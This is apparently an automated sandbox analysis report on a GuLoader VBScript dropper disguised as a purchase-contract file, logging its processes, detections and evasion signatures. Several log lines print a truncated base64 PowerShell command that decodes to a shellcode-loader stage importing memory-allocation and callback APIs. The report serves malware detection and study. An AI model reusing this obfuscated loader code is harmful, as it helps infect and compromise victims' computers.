    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwJump to behavior
    Potential malicious VBS script found (suspicious strings)
    Source: Initial file: Intercompa.ShellExecute Numb5, "-NoExit -EncodedCommand " & chr(34) & Svine & chr(34), "", "", 0
    Source: Initial file: Intercompa.ShellExecute Klagenspar, "-NoExit -EncodedCommand " & chr(34) & Svine & chr(34), "", "", 0
    Very long command line found
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3956
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3956Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_032720195_2_03272019
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_032719385_2_03271938
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0327CE385_2_0327CE38
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_032727085_2_03272708
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_082CBB685_2_082CBB68
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_082CEBB05_2_082CEBB0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_082C72905_2_082C7290
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_082C5A305_2_082C5A30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_082C5A405_2_082C5A40
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
    Source: tregrene-KaufVertraeg-JoachimSvensson-23564334.vbsInitial sample: Strings found which are bigger than 50
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP"Jump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220126Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz54gho0.0ha.ps1Jump to behavior
    Source: classification engineClassification label: mal84.troj.evad.winVBS@8/10@0/0
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_01
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

    barindex
    VBScript performs obfuscated calls to suspicious functions
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", "-NoExit -EncodedCommand "IwBlAHIAaAB2AG", "", "", "0")
    Yara detected GuLoader
    Source: Yara matchFile source: 00000005.00000002.893175053.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0327A067 push esp; retf 5_2_0327A079
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0327C489 push esp; retf 5_2_0327C495
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0327FC62 push edi; retf 5_2_0327FC66
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.dllJump to dropped file
